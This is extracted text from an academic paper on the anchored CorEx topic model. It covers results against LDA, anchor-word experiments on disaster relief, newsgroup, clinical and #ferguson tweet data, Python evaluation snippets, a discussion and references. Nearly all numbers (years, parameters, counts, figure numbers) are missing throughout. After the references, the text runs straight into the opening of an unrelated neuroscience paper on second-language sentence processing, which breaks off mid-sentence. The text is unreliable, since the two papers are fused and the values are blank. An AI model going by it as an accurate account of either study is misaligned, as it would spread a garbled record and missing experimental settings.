we wish to systematically test the effect of anchor words given the domain-specific lexicons. to do so, we follow the approach used by jagarlamudi et al. ( ) to automatically generate anchor words: for each label in a data set, we find the words that have the highest mutual information with the label. for word w and label l, this is computed as

i(l : w) = h(l) − h(l | w),

where for each document of label l we consider if the word w appears or not.

figure : baseline comparison of corex to lda with respect to topic coherence, document classification (macro and micro f scores), and clustering (homogeneity) on the disaster relief articles, newsgroups, and clinical health notes as the number of topics varies. points are the average of runs of a topic model. confidence intervals are plotted but are so small that they are not distinguishable. corex is trained using binary data, while lda is trained on count data. homogeneity is not well-defined on the multi-label clinical health notes, so it is omitted.

results

. lda baseline comparison

we compare corex to lda in terms of topic coherence, document classification, and document clustering across three datasets. corex is trained on binary data, while lda is trained on count data. while not reported here, corex consistently outperformed lda trained on binary data. in doing these comparisons, we use the gensim implementation of lda (řehůřek and sojka, ). the results of comparing corex to lda as a function of the number of topics are presented in figure .

across all three datasets, we find that the topics produced by corex yield document classification results that are on par with or better than those produced by lda topics.
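the classification and clustering evaluations described in the evaluation section above reduce to a few scikit-learn calls. the helper below assumes a doc_topic matrix of per-document topic proportions from some fitted topic model; the train-test ratio is a placeholder, since the exact split used above is not recoverable from the text, and the classifier settings are ordinary defaults rather than the original configuration.

```python
import numpy as np
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import adjusted_mutual_info_score, f1_score, homogeneity_score
from sklearn.model_selection import train_test_split

def evaluate_topic_model(doc_topic, labels, test_size=0.5, seed=0):
    """Document classification and clustering quality from a document-topic matrix."""
    # classification: the topic distribution of each document is its feature vector
    X_tr, X_te, y_tr, y_te = train_test_split(
        doc_topic, labels, test_size=test_size, random_state=seed, stratify=labels)
    clf = LogisticRegression(max_iter=1000).fit(X_tr, y_tr)
    pred = clf.predict(X_te)

    # clustering: assign each document to its highest-probability topic
    clusters = np.argmax(doc_topic, axis=1)

    return {
        "macro_f1": f1_score(y_te, pred, average="macro"),
        "micro_f1": f1_score(y_te, pred, average="micro"),
        "homogeneity": homogeneity_score(labels, clusters),
        "adjusted_mutual_info": adjusted_mutual_info_score(labels, clusters),
    }
```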
in terms of clustering, corex consistently produces document clusters of higher homogeneity than lda. on the disaster relief articles, the corex clusters are nearly twice as homogeneous as the lda clusters.

corex outperforms lda in terms of topic coherence on two out of three of the datasets. while lda produces more coherent topics for the clinical health notes, it is particularly striking that corex is able to produce high quality topics while only leveraging binary count data. examples of these topics are shown in table . despite the binary counts limitation, corex still finds meaningfully coherent and competitive structure in the data.

table : examples of topics learned by the corex topic model. words are ranked according to mutual information with the topic, and topics are ranked according to the amount of total correlation they explain. topic models were run with topics on the reliefweb and newsgroups datasets, and topics on the clinical health notes.
disaster relief topics:
- drought, farmers, harvest, crop, livestock, planting, grain, maize, rainfall, irrigation
- eruption, volcanic, lava, crater, eruptions, volcanos, slopes, volcanic activity, evacuated, lava flows
- winter, snow, snowfall, temperatures, heavy snow, heating, freezing, warm clothing, severe winter, avalanches
- military, armed, civilians, soldiers, aircraft, weapons, rebel, planes, bombs, military personnel
newsgroups topics:
- team, game, season, player, league, hockey, play, teams, nhl
- car, bike, cars, engine, miles, road, ride, riding, bikes, ground
- nasa, launch, orbit, shuttle, mission, satellite, gov, jpl, orbital, solar
- medical, disease, doctor, patients, treatment, medicine, health, hospital, doctors, pain
clinical health notes topics:
- vomiting, nausea, abdominal pain, diarrhea, fever, dehydration, chill, clostridium difficile, intravenous fluid, compazine
- anxiety state, insomnia, ativan, neurontin, depression, lorazepam, gabapentin, trazodone, fluoxetine, headache
- pain, oxycodone, tylenol, percocet, ibuprofen, morphine, osteoarthritis, hernia, motrin, bleeding

figure : comparison of anchored corex to other semi-supervised topic models in terms of document clustering and topic coherence (panels show homogeneity, adjusted mutual information, and coherence for corex, lda, anchored corex, must/cannot link lda, and z-labels lda, grouped into unsupervised and semi-supervised models, on the disaster relief articles and the newsgroups). for each dataset, the number of topics is fixed to the number of document labels. each dot is the average of runs. confidence intervals are plotted but are so small that they are not distinguishable.

. anchored corex analysis

we now examine the effects and benefits of guiding corex through anchor words. in doing so, we also compare anchored corex to other semi-supervised topic models.

. . anchoring for topic separability

we are first interested in how anchoring can be used to encourage topic separability so that documents cluster well. we focus on the ha/dr articles and newsgroups datasets, since traditional clustering metrics are not well-defined on the multi-label clinical health notes.
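the umass coherence scores used in the comparisons above can be computed with gensim's coherencemodel; the snippet below is a sketch on toy token lists, assuming gensim's standard interface (topics plus a bag-of-words corpus and dictionary for the 'u_mass' setting), not the evaluation code used for the reported numbers.

```python
from gensim.corpora import Dictionary
from gensim.models import CoherenceModel

# toy tokenized corpus and the top words of two hypothetical topics
tokenized_docs = [
    ["drought", "harvest", "crops", "rainfall"],
    ["eruption", "lava", "crater", "evacuated"],
    ["drought", "rainfall", "irrigation", "harvest"],
]
topic_words = [["drought", "rainfall", "harvest"], ["eruption", "lava", "crater"]]

dictionary = Dictionary(tokenized_docs)
corpus = [dictionary.doc2bow(doc) for doc in tokenized_docs]

cm = CoherenceModel(topics=topic_words, corpus=corpus,
                    dictionary=dictionary, coherence="u_mass")
print(cm.get_coherence())            # average umass coherence over topics
print(cm.get_coherence_per_topic())  # one score per topic
```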
for both datasets, we fix the number of topics to be equal to the number of document labels. it is in this context that we compare anchored corex to two other semi-supervised topic models: z-labels lda and must/cannot link lda.

using the method described in section . , we automatically retrieve the top five anchors for each disaster type and newsgroup. we then filter these lists of any words that are ambiguous, i.e. words that are anchor words for more than one document label. for anchored corex and z-labels lda we simultaneously assign each set of anchor words to exactly one topic each. for must/cannot link lda, we create must-links within the words of the same anchor group, and create cannot-links between words of different anchor groups. since we are simultaneously anchoring to many topics, we use a weak anchoring parameter β = for anchored corex. using the notation from their original papers, we use η = for z-labels lda, and η = for must/cannot link lda. for both lda variants, we use α = . , β = . and take , samples, and estimate the models using code implemented by the original authors.

the results of this comparison are shown in figure , and examples of anchored corex topics are shown in table . across all measures corex and anchored corex outperform lda. we find that anchored corex always improves cluster quality versus corex in terms of homogeneity and adjusted mutual information. compared to corex, multiple simultaneous anchoring neither harms nor benefits the topic coherence of anchored corex. together these metrics suggest that anchored corex is finding topics that are of equivalent coherence to corex, but more relevant to the document labels since gains are seen in terms of document clustering.

table : examples of topics learned by corex when simultaneously anchoring many topics with anchoring parameter β = . anchor words are shown in bold. words are ranked according to mutual information with the topic, and topics are ranked according to the amount of total correlation they explain. topic models were run with topics on the reliefweb articles and topics on the newsgroups dataset.
anchored disaster relief topics:
- harvest, locus, drought, food crisis, farmers, crops, crop, malnutrition, food aid, livestock
- tents, quake, international federation, red crescent, red cross, blankets, earthquake, richter scale, societies, aftershocks
- climate, impacts, warming, climate change, irrigation, consumption, household, droughts, livelihoods, interventions
- storms, weather, winds, coastal, tornado, meteorological, tornadoes, strong winds, tropical, roofs
anchored newsgroups topics:
- government, congress, clinton, state, national, economic, general, states, united, order
- bible, christian, god, jesus, christians, believe, life, faith, world, man
- use, used, high, circuit, power, work, voltage, need, low, end
- baseball, pitching, braves, mets, hitter, pitcher, cubs, dl, sox, jays

against the other semi-supervised topic models, anchored corex compares favorably. the document clustering of anchored corex is similar to, or better than, that of z-labels lda and must/cannot link lda. across the disaster relief articles, anchored corex finds less coherent topics than the two lda variants, while it finds similarly coherent topics as must/cannot link lda on the newsgroup dataset.
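the per-label anchor sets used in this comparison follow the recipe above: rank words by mutual information with each label, keep the top few, and drop any word that would anchor more than one label. the functions below are an illustrative re-implementation on a binary document-term matrix, not the original code.

```python
import numpy as np
from sklearn.metrics import mutual_info_score

def top_words_by_mi(X_binary, labels, vocab, label, n_words=5):
    """Words with the highest mutual information i(l : w) with one document label."""
    indicator = (np.asarray(labels) == label).astype(int)
    scores = [mutual_info_score(indicator, X_binary[:, j]) for j in range(X_binary.shape[1])]
    return [vocab[j] for j in np.argsort(scores)[::-1][:n_words]]

def build_anchor_sets(X_binary, labels, vocab, n_words=5):
    """Top-MI anchor candidates per label, with ambiguous words filtered out."""
    candidates = {lab: top_words_by_mi(X_binary, labels, vocab, lab, n_words)
                  for lab in sorted(set(labels))}
    counts = {}
    for words in candidates.values():
        for w in words:
            counts[w] = counts.get(w, 0) + 1
    # a word that is an anchor candidate for more than one label is ambiguous and removed
    return {lab: [w for w in words if counts[w] == 1] for lab, words in candidates.items()}
```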
. . anchoring for topic representation

we now turn to studying how domain knowledge can be anchored to a single topic to help an otherwise dominated topic emerge, and how the anchoring parameter β affects that emergence. to discern this effect, we focus just on anchored corex along with the ha/dr articles and clinical health notes, datasets for which we have a domain expert lexicon.

we devise the following experiment: first, we determine the top five anchor words for each document label using the methodology described in section . . unlike in the previous section, we do not filter these lists of ambiguous anchor words. second, for each document label, we run an anchored corex topic model with that label's anchor words anchored to exactly one topic. we compare this anchored topic model to an unsupervised corex topic model using the same random seeds, thus creating a matched pair where the only difference is the treatment of anchor words. finally, this matched pairs process is repeated times, yielding a distribution for each metric over each label.

figure : effect of anchoring words to a single topic for one document label at a time as a function of the anchoring parameter β (rows show the topic overlap difference post-anchoring, the percent change in topic coherence, and the f difference post-anchoring, for the disaster relief articles and the clinical health notes). light gray lines indicate the trajectory of the metric for a given disaster or disease label. thick red lines indicate the pointwise average across all labels for fixed value of β.

we use topics when modeling the reliefweb articles and topics when modeling the i b clinical health notes. these values were chosen by observing diminishing returns to the total correlation explained by additional topics.

in figure we show how the results of this experiment vary as a function of the anchoring parameter β for each disaster and disease type in the two data sets. since there is heavy variance across document labels for each metric, we also examine a more detailed cross section of these results in figure , where we set β = for the clinical health notes and set β = for the disaster relief articles. as we show momentarily, disaster and disease types that benefit the most from anchoring were underrepresented pre-anchoring.
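the matched-pairs protocol described above can be organized as a simple loop: for each repetition, fit an anchored and an unanchored model with the same random seed and record the difference in whatever metric is of interest. the sketch assumes the open-source corextopic package with its anchors/anchor_strength keywords (an assumption about the installed version), a sparse binary matrix x, and a user-supplied metric function; the number of repetitions is a placeholder.

```python
from corextopic import corextopic as ct

def matched_pair_differences(X, vocab, anchor_words, n_topics, beta, metric, n_repeats=10):
    """Distribution of metric differences between anchored and unanchored CorEx runs."""
    diffs = []
    for seed in range(n_repeats):
        anchored = ct.Corex(n_hidden=n_topics, seed=seed)
        anchored.fit(X, words=vocab, anchors=[anchor_words], anchor_strength=beta)

        # same seed, no anchors: the matched pair differs only in the anchoring
        unanchored = ct.Corex(n_hidden=n_topics, seed=seed)
        unanchored.fit(X, words=vocab)

        diffs.append(metric(anchored) - metric(unanchored))
    return diffs
```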
figure : cross-section results of the anchoring metrics from fixing β = for the clinical health notes, and β = for the disaster relief articles (columns show the topic overlap difference post-anchoring, the percent change of anchored topic coherence when it is the most predictive topic, and the f difference post-anchoring; rows cover the disaster types tropical cyclone, flood, epidemic, earthquake, drought, volcano, flash flood, insect infestation, cold wave, technological disaster, tsunami, land slide, wild fire, severe local storm, other, snow avalanche, extratropical cyclone, mud slide, heat wave, storm surge, and fire, and the disease types asthma, coronary heart disease, congestive heart failure, depression, diabetes, gerd, gallstones, gout, hypercholesterolemia, hypertension, hypertriglyceridemia, osteoarthritis, obstructive sleep apnea, obesity, and peripheral vascular disease). disaster and disease types are sorted by frequency, with the most frequent document labels appearing at the top. error bars indicate % confidence intervals. the color bars provide context for each metric: topic overlap pre-anchoring, proportion of topic model runs where the anchored topic was the most predictive topic, and f score pre-anchoring.

document labels that were well-represented prior to anchoring achieve only marginal gain. this results in the variance seen in figure .

a priori we do not know that anchoring will cause the anchor words to appear at the top of topics. so, we first measure how the topic overlap, the proportion of the top ten mutual information words that appear within the top ten words of the topics, changes before and after anchoring. from figure (row ) we see that as β increases, more of these relevant words consistently appear within the topics. for the disaster relief articles, many disaster types see about two more words introduced, while in the clinical health notes the overlap increases by up to four words. analyzing the cross section in figure (column ), we see many of these gains come from disaster and disease types that appeared less in the topics pre-anchoring. thus, we can sway the topic model towards less dominant themes through anchoring. document labels that occur the most frequently are those for which the topic overlap changes the least.

next, we examine whether these anchored topics are more coherent topics. to do so, we compare the coherence of the anchored topic with that of the most predictive topic pre-anchoring, i.e. the topic with the largest corresponding coefficient in magnitude of the logistic regression, when the anchored topic itself is most predictive. from figure (row ), we see these results have more variance, but largely the anchored topics are more coherent. in some cases, the coherence is . to times that of pre-anchoring. furthermore, by colors of the central panel of figure , we find that the anchored topics are, indeed, often the most predictive topics for each document label. similar to topic overlap, the labels that see the least improvement are those that appear the most and are already well-represented in the topic model.

finally, we find that the anchored, more coherent topics can lead to modest gains in document classification. for the disaster relief articles, figure (row ) shows that there are mixed results in terms of f score improvement, with some disaster types performing consistently better, and others performing consistently worse. the results are more consistent for the clinical health notes, where there is an average increase of about . in the f score, and some disease types see an increase of up to . in f . given that we are only anchoring words to the topic model, these are significant gains in predictive power.

unlike the gains in topic overlap and coherence, the f score increases do not simply correlate with which document labels appeared most frequently. for example, we see in figure (column ) that tropical cyclone exhibits the largest increase in predictive performance, even though it is also one of the most frequently appearing document labels.
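the topic overlap measure used above (the share of a label's top-ten mutual-information words that show up among the top ten words of the learned topics) is straightforward to compute; the helper below is a hypothetical re-implementation for illustration, with invented example lists.

```python
def topic_overlap(label_top_words, topic_top_words):
    """Fraction of a label's top-MI words that appear among the top words of any topic."""
    covered = {w for topic in topic_top_words for w in topic}
    return sum(1 for w in label_top_words if w in covered) / len(label_top_words)

label_words = ["drought", "harvest", "crops", "rainfall", "irrigation"]
topics_unsupervised = [["winter", "snow", "freezing"], ["drought", "farmers", "maize"]]
topics_anchored = [["drought", "harvest", "crops"], ["winter", "snow", "freezing"]]

before = topic_overlap(label_words, topics_unsupervised)
after = topic_overlap(label_words, topics_anchored)
print("topic overlap difference post-anchoring:", after - before)
```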
similarly, some of the major gains in f for the disease types, and major losses in f for the disaster types, do not come from the most or least frequent document labels. thus, if anchoring single topics within corex for document classification, it is important to examine how the anchoring affects prediction for individual document labels.

. . anchoring for topic aspects

finding topics that revolve around a word, such as a name or location, or a group of words can aid in understanding how a particular subject or event has been framed. we finish with a qualitative experiment where we disambiguate aspects of a topic by anchoring a set of words to multiple topics within the corex topic model. note, must/cannot link lda cannot be used in this manner, and z-labels lda would require us to know these aspects beforehand.

we consider tweets containing #ferguson (case-insensitive), which detail reactions to the shooting of black teenager michael brown by white police officer darren wilson on august th, in ferguson, missouri. these tweets were collected from the twitter gardenhose, a % random sample of all tweets, over the period august th, to november th, . since corex will seek maximally informative topics by exploiting redundancies, we remove duplicates of retweets, leaving us with , tweets. we filter these tweets of punctuation, stop words, hyperlinks, usernames, and the 'rt' retweet symbol, and use the top , word types.

in the wake of both the shooting and the eventual non-indictment of darren wilson, several protests occurred. some onlookers supported and encouraged such protests, while others characterized the protests as violent "riots." to disambiguate these different depictions, we train a corex topic model with topics, anchoring "protest" and "protests" together to five topics, and "riot" and "riots" together to five topics with β = . these anchored topics are presented in table .

table : topic aspects around "protest" and "riot" from running a corex topic model with topics and anchoring "protest" and "protests" together to five topics and "riot" and "riots" together to five topics with β = . anchor words are shown in bold. note, topics are not ordered by total correlation.
topic aspects of "protest":
- protest, protests, peaceful, violent, continue, night, island, photos, staten, nights
- protest, protests, #hiphopmoves, #cole, hiphop, nationwide, moves, fo, anheuser, boeing
- protest, protests, st, louis, guard, national, county, patrol, highway, city
- protest, protests, paddy, covering, beverly, walmart, wagon, hills, passionately, including
- protest, protests, solidarity, march, square, rally, #oakland, downtown, nyc, #nyc
topic aspects of "riot":
- riot, riots, unheard, language, inciting, accidentally, jokingly, watts, waving, dies
- riot, black, riots, white, #tcot, blacks, men, whites, race, #pjnet
- riot, riots, looks, like, sounds, acting, act, animals, looked, treated
- riot, riots, store, looting, businesses, burning, fire, looted, stores, business
- gas, riot, tear, riots, gear, rubber, bullets, military, molotov, armored

the anchored topics reflect different aspects of the framing of the "protests" and "riots," and are generally interpretable, despite the typical difficulty of extracting coherent topics from short documents using lda (tang et al., ). the "protest" topic aspects describe protests in st.
louis, oakland, bev- erly hills, and parts of new york city (topics , , , ), resistance by law enforcement (topics and ), and discussion of whether the protests were peaceful (topic ). topic revolves around hip-hop artists who marched in solidarity with protesters. the “riot” topic aspects discuss racial dynamics of the protests (topic ) and suggest the demonstrations are dangerous (topics and ). topic describes the “riot” gear used in the militarized response to the ferguson protesters, and topic also hints at aspects of conservatism through the hashtags #tcot (top conservatives on twitter) and #pjnet (patriot journalist network). as we see, anchored corex finds several in- teresting, non-trivial aspects around “protest” and “riot” that could spark additional qualitative inves- tigation. retrieving topic aspects through anchor words in this manner allows the user to explore dif- ferent frames of complex issues, events, or discus- sions within documents. as with the other anchor- ing strategies, this has the potential to supplement qualitative research done by researchers within the social sciences and digital humanities. discussion we have introduced an information-theoretic topic model, corex, that does not rely on any of the gener- ative assumptions of lda-based topic models. this topic model seeks maximally informative topics as encoded by their total correlation. we also derived a flexible method for anchoring word-level domain knowledge in the corex topic model through the in- formation bottleneck. anchored corex guides the topic model towards themes that do not naturally emerge, and often produces more coherent and pre- dictive topics. both corex and anchored corex consistently produce topics that are of comparable quality to lda-based methods, despite only making use of binarized word counts. anchored corex is more flexible than previous attempts at integrating word-level information into topic models. topic separability can be enforced by lightly anchoring disjoint groups of words to sepa- rate topics, topic representation can be promoted by assertively anchoring a group of words to a single topic, and topic aspects can be unveiled by anchor- ing a single group of words to multiple topics. the flexibility of anchoring through the information bot- tleneck lends itself to many other possible creative anchoring strategies that could guide the topic model in different ways. different goals may call for dif- ferent anchoring strategies, and domain experts can shape these strategies to their needs. while we have demonstrated several advantages of the corex topic model to lda, it does have some technical shortcomings. most notably, corex re- lies on binary count data in its sparsity optimiza- tion, rather than the standard count data that is used as input into lda and other topic models. while we have demonstrated corex performs at the level of lda despite this limitation, its effect would be more noticeable on longer documents. this can be partly overcome if one chunks such longer docu- ments into shorter subdocuments prior to running the topic model. our implementation also requires that each word appears in only one topic. these lim- itations are not fundamental limitations of the the- ory, but a matter of computational efficiency. in future work, we hope to remove these restrictions while preserving the speed of the sparse corex topic modeling algorithm. 
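for completeness, this is roughly how the three anchoring strategies summarized above are expressed with the open-source corextopic package released by the corex authors; the anchors and anchor_strength keyword names are assumed from its documented interface and may differ across versions, and the word lists, topic count, and strength value are invented examples rather than settings from the experiments above.

```python
import numpy as np
import scipy.sparse as ss
from corextopic import corextopic as ct

# toy binary document-term matrix; a real run would use the lexicon-based matrices above
vocab = ["drought", "harvest", "crops", "protest", "protests", "riot", "riots", "winter"]
X = ss.csr_matrix(np.random.default_rng(0).integers(0, 2, size=(40, len(vocab))))

model = ct.Corex(n_hidden=6, seed=1)  # topic count is an arbitrary choice here
model.fit(
    X,
    words=vocab,
    anchors=[
        ["drought", "harvest", "crops"],  # several word types anchored to a single topic
        ["protest", "protests"],          # the same pair anchored to two different topics,
        ["protest", "protests"],          #   to draw out distinct aspects of one theme
    ],
    anchor_strength=3,                    # invented strength; nudges rather than forces topics
)

for k, topic in enumerate(model.get_topics(n_words=5)):
    print(k, [entry[0] for entry in topic])  # entry[0] is the word; other fields are scores
```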
as we have demonstrated, the information- theoretic approach provided via corex has rich po- tential for finding meaningful structure in docu- ments, particularly in a way that can help domain experts guide topic models with minimal interven- tion to capture otherwise eclipsed themes. the lightweight and versatile framework of anchored corex leaves open possibilities for theoretical ex- tensions and novel applications within the realm of topic modeling. acknowledgments we would like to thank the machine intelligence and data science (minds) research group at the infor- mation sciences institute for their help and insight during the course of this research. we also thank the vermont advanced computing core (vacc) for its computational resources. finally, we thank the anonymous reviewers and the tacl action editors diane mccarthy and kristina toutanova for their time and effort in helping us improve our work. ryan j. gallagher was a visiting research assistant at the information sciences institute while perform- ing this research. ryan j. gallagher and greg ver steeg were supported by darpa award hr - -c- and david kale was supported by the alfred e. mann innovation in engineering doctoral fellowship. references david andrzejewski and xiaojin zhu. . latent dirichlet allocation with topic-in-set knowledge. in proceedings of the naacl hlt workshop on semi-supervised learning for natural language pro- cessing, pages – . association for computational linguistics. david andrzejewski, xiaojin zhu, and mark craven. . incorporating domain knowledge into topic modeling via dirichlet forest priors. in proceedings of the th annual international conference on machine learning, pages – . david andrzejewski, xiaojin zhu, mark craven, and benjamin recht. . a framework for incorpo- rating general domain knowledge into latent dirichlet allocation using first-order logic. in proceedings of the international joint conference on artificial intelli- gence, volume , page . sanjeev arora, rong ge, and ankur moitra. . learning topic models–going beyond svd. in ieee rd annual symposium on foundations of computer science (focs), pages – . ieee. sanjeev arora, rong ge, yonatan halpern, david m. mimno, ankur moitra, david sontag, yichen wu, and michael zhu. . a practical algorithm for topic modeling with provable guarantees. in proceedings of international conference on machine learning, pages – . david m. blei, andrew y. ng, and michael i. jordan. . latent dirichlet allocation. journal of ma- chine learning research, (jan): – . wray buntine and aleks jakulin. . discrete compo- nent analysis. in subspace, latent structure and fea- ture selection, pages – . springer. jonathan chang, sean gerrish, chong wang, jordan l. boyd-graber, and david m. blei. . reading tea leaves: how humans interpret topic models. in advances in neural information processing systems, pages – . wendy w. chapman, will bridewell, paul hanbury, gre- gory f. cooper, and bruce g. buchanan. . a simple algorithm for identifying negated findings and diseases in discharge summaries. journal of biomedi- cal informatics, ( ): – . peixian chen, nevin l. zhang, leonard k. m. poon, and zhourong chen. . progressive em for latent tree models and hierarchical topic detection. in proceed- ings of the thirtieth aaai conference on artificial in- telligence, pages – . manhong dai, nigam h. shah, wei xuan, mark a. musen, stanley j. watson, brian d. athey, fan meng, et al. . an efficient solution for mapping free text to ontology terms. 
amia summit on translational bioinformatics, . chris ding, tao li, and wei peng. . on the equiv- alence between non-negative matrix factorization and probabilistic latent semantic indexing. computational statistics & data analysis, ( ): – . james foulds, shachi kumar, and lise getoor. . latent topic networks: a versatile probabilistic pro- gramming framework for topic models. in pro- ceedings of the international conference on machine learning, pages – . nir friedman, ori mosenzon, noam slonim, and naftali tishby. . multivariate information bottleneck. in proceedings of the seventeenth conference on uncer- tainty in artificial intelligence, pages – . thomas l. griffiths, michael i. jordan, joshua b. tenen- baum, and david m. blei. . hierarchical topic models and the nested chinese restaurant process. in advances in neural information processing systems, pages – . yoni halpern, youngduck choi, steven horng, and david sontag. . using anchors to estimate clini- cal state without labeled data. in amia annual sympo- sium proceedings. american medical informatics as- sociation. yoni halpern, steven horng, and david sontag. . anchored discrete factor analysis. arxiv preprint arxiv: . . nathan hodas, greg ver steeg, joshua harrison, satish chikkagoudar, eric bell, and courtney corley. . disentangling the lexicons of disaster response in twitter. in the rd international workshop on social web for disaster management (swdm’ ). matthew d. hoffman, david m. blei, chong wang, and john paisley. . stochastic variational inference. journal of machine learning research, ( ): – . thomas hofmann. . probabilistic latent semantic analysis. in proceedings of the fifteenth conference on uncertainty in artificial intelligence, pages – . jagadeesh jagarlamudi, hal daumé iii, and raghaven- dra udupa. . incorporating lexical priors into topic models. in proceedings of the th conference of the european chapter of the association for com- putational linguistics, pages – . association for computational linguistics. moontae lee and david mimno. . low- dimensional embeddings for interpretable anchor- based topic inference. in proceedings of empiri- cal methods in natural language processing, pages – . moshe lichman. . uc irvine machine learning repository. jon d. mcauliffe and david m. blei. . supervised topic models. in advances in neural information pro- cessing systems, pages – . shike mei, jun zhu, and jerry zhu. . robust reg- bayes: selectively incorporating first-order logic do- main knowledge into bayesian models. in proceed- ings of the st international conference on machine learning (icml- ), pages – . david mimno, hanna m. wallach, edmund talley, miriam leenders, and andrew mccallum. . op- timizing semantic coherence in topic models. in pro- ceedings of the conference on empirical methods in natural language processing, pages – . asso- ciation for computational linguistics. thang nguyen, yuening hu, and jordan l. boyd-graber. . anchors regularized: adding robustness and extensibility to scalable topic-modeling algorithms. in proceedings of the association of computational lin- guistics, pages – . thang nguyen, jordan boyd-graber, jeffrey lund, kevin seppi, and eric ringger. . is your anchor going up or down? fast and accurate supervised topic models. in proceedings of north american chapter of the association for computational linguistics. 
fabian pedregosa, gaël varoquaux, alexandre gram- fort, vincent michel, bertrand thirion, oliver grisel, mathieu blondel, peter prettenhofer, ron weiss, vin- cent dubourg, jake vanderplas, alexandre passos, david cournapeau, matthieu brucher, matthieu per- rot, and édouard duchesnay. . scikit-learn: ma- chine learning in python. journal of machine learn- ing research, : – . radim řehůřek and petr sojka. . software frame- work for topic modeling with large corpora. in pro- ceedings of the lrec workshop on new chal- lenges for nlp frameworks, pages – . kyle reing, david c. kale, greg ver steeg, and aram galstyan. . toward interpretable topic discovery via anchored correlation explanation. icml workshop on human interpretability in machine learning. michal rosen-zvi, thomas griffiths, mark steyvers, and padhraic smyth. . the author-topic model for au- thors and documents. in proceedings of the th con- ference on uncertainty in artificial intelligence, pages – . jian tang, zhaoshi meng, xuanlong nguyen, qiaozhu mei, and ming zhang. . understanding the limit- ing factors of topic modeling via posterior contraction analysis. in proceedings of the international confer- ence on machine learning, pages – . naftali tishby, fernando c. pereira, and william bialek. . the information bottleneck method. in pro- ceedings of th annual allerton conference on com- munication, control and computing, pages – . greg ver steeg and aram galstyan. . discovering structure in high-dimensional data through correlation explanation. in advances in neural information pro- cessing systems, pages – . greg ver steeg and aram galstyan. . maxi- mally informative hierarchical representations of high- dimensional data. in artificial intelligence and statis- tics, pages – . brain- - -ver -weber_ p .. overlap and differences in brain networks underlying the processing of complex sentence structures in second language users compared with native speakers kirsten weber, , lisa luther, peter indefrey, , and peter hagoort , abstract when we learn a second language later in life, do we integrate it with the established neural networks in place for the first language or is at least a partially new network recruited? while there is evidence that simple grammatical structures in a second language share a system with the native language, the story becomes more multifaceted for complex sentence structures. in this study, we investigated the underlying brain networks in native speakers com- pared with proficient second language users while processing complex sentences. as hypothesized, complex structures were processed by the same large-scale inferior frontal and middle temporal language networks of the brain in the second language, as seen in native speakers. these effects were seen both in activations and task-related connectivity patterns. furthermore, the second language users showed increased task-related con- nectivity from inferior frontal to inferior parietal regions of the brain, regions related to attention and cognitive control, suggesting less automatic processing for these structures in a second language. key words: activation; bilingualism; connectivity; fmri; language; ppi; syntax introduction when we learn a second language later in life, wealready have an entire first language system in place. there is an established system, a brain network, for process- ing sounds, words, and sentences in this language. 
as we start learning a second language, it is intuitively plausible that we recruit parts of the same brain network that is already established for the first language. indeed most meta-analysis studies on second language processing in the brain confirm this idea (indefrey, ) at least if participants are proficient in their second language (sebastian et al., ). these stud- ies largely focused on simple sentence structures that overlap in structure with those in the first language. however, we know less about the networks engaged in processing com- plex structures and especially those structures that have no direct correspondents in the first language. a structure that does not exist in the same form in the first language cannot be tested across languages in the same sub- jects. in this study, we therefore compared the processing of complex sentence structures in a group of second language users to a group of native speakers of dutch. we investigated two types of complex sentence structures, one that existed in the first language of the second language user group (a right- branching structure) and one that did not (a crossed depen- dency structure). crossed dependencies (fig. a) are complex sentence structures that are infrequent in their appearance across the languages of the world, dutch and swiss–german being among the few. in standard german, a nested dependency structure would be used instead (fig. c). these sentences look very similar: both have nonlocal dependencies and only the final verbs appear to be swapped. nonetheless, lin- guistically, they belong to different types of syntactic classes (nowak et al., ). the crossed dependency structure is generated by context-sensitive grammars, while the nested dependency structure is generated by the lower class of context-free grammars. psycholinguists have discovered dif- ferences in the processing of these structures (bach et al., ; kaan and vasić, ). however, contrary to the lin- guistic hierarchy, the crossed dependencies appear to be eas- ier to process than the nested dependency structures. therefore, both from a linguistic and a psycholinguistic per- spective, crossed dependency structures are different from nested dependency structures in their syntactic structure, while the meaning conveyed is similar. max planck institute for psycholinguistics, nijmegen, the netherlands. donders centre for cognitive neuroimaging, donders institute for brain, cognition and behaviour, radboud university nijmegen, nijmegen, the netherlands. department of linguistics, heinrich-heine university, duesseldorf, germany. brain connectivity volume , number , ª mary ann liebert, inc. doi: . /brain. . the processing of crossed dependencies in second lan- guage speakers is thus an interesting test bed to investigate how these later learned complex structures are processed in the brain. right-branching sentence structures (fig. b, d) on the other hand are structures with a similar meaning to the sentences in figure a and c, but with an equivalent structure across the two languages. moreover, while still complex structures, they are thought to be easier to process than embedded structures (stromswold et al., ). while crossed dependencies do not exist in german, ger- man native speakers can nonetheless acquire and understand these structures rapidly, even in adulthood (davidson and indefrey, ; uddén et al., ), as evidenced by behav- ioral and electrophysiological measures. 
accordingly, one might assume that the same hemodynamic effects should be found whether the structure is processed by a first lan- guage speaker or second language user. in the initial analysis of the present dataset published in weber’s phd thesis ( ), syntactic hemodynamic repetition effects of crossed dependency structures in a first language speaker group were compared with the repetition effects of the same structures in a second language (l ) user group. this analysis showed subtle differences in the repetition ef- fects between the two groups. however, these effects, while different across groups (the native speaker group showed a repetition enhancement effect and not the expected repetition suppression effect, while the german group did not), were not in the expected direction and moreover very subtle, only pres- ent in a region of interest analysis (focusing on the left inferior frontal gyrus and left and right temporal cortex). while this hints at a slightly different organization of the processing systems within the same brain regions, in the pres- ent analysis, we were interested in figuring out whether the overall brain activation patterns and networks differed across the two groups. more specifically, we were interested in dis- covering whether the overall language network was larger in the l user group or whether the networks completely overlap at the whole-brain level. in this article, we thus report a com- plementary classic activation and functional connectivity analysis of this dataset to elucidate whether differences in he- modynamic responses between the two groups are confined to the core regions of the language network or whether the lan- guage network is organized differently for processing the same language as an l or as an l . according to some theories, later learned syntactic struc- tures should at least initially be processed by a different brain network. ullman ( a) proposed that l speakers rely more on a declarative system to process the second lan- guage, while l processing is more procedural. two differ- ent neural networks, that is, a left frontotemporal and a frontostriatal network are proposed to underlie these pro- cesses, respectively (ullman, b). both are claimed to in- volve broca’s area (ullman, ). others propose that while the overall network for gram- matical processing is very similar for the first and second lan- guage, there are activation differences. namely, l speakers engage more regions if the l was acquired later in life and specifically if they are less proficient in the l . this pertains especially to regions related to cognitive control, such as those regions related to suppressing interfering lexical or syntactic representations from the other language (abutalebi et al., ; green and abutalebi, ). other accounts sug- gest differences in the processing of local and nonlocal de- pendencies (clahsen and felser, ; dallas and kaan, ). in case of local dependencies, l grammatical pro- cessing can become native-like. however, the processing of complex syntax, such as nonlocal dependencies, might differ (clahsen and felser, ). yet, others claim that the same brain 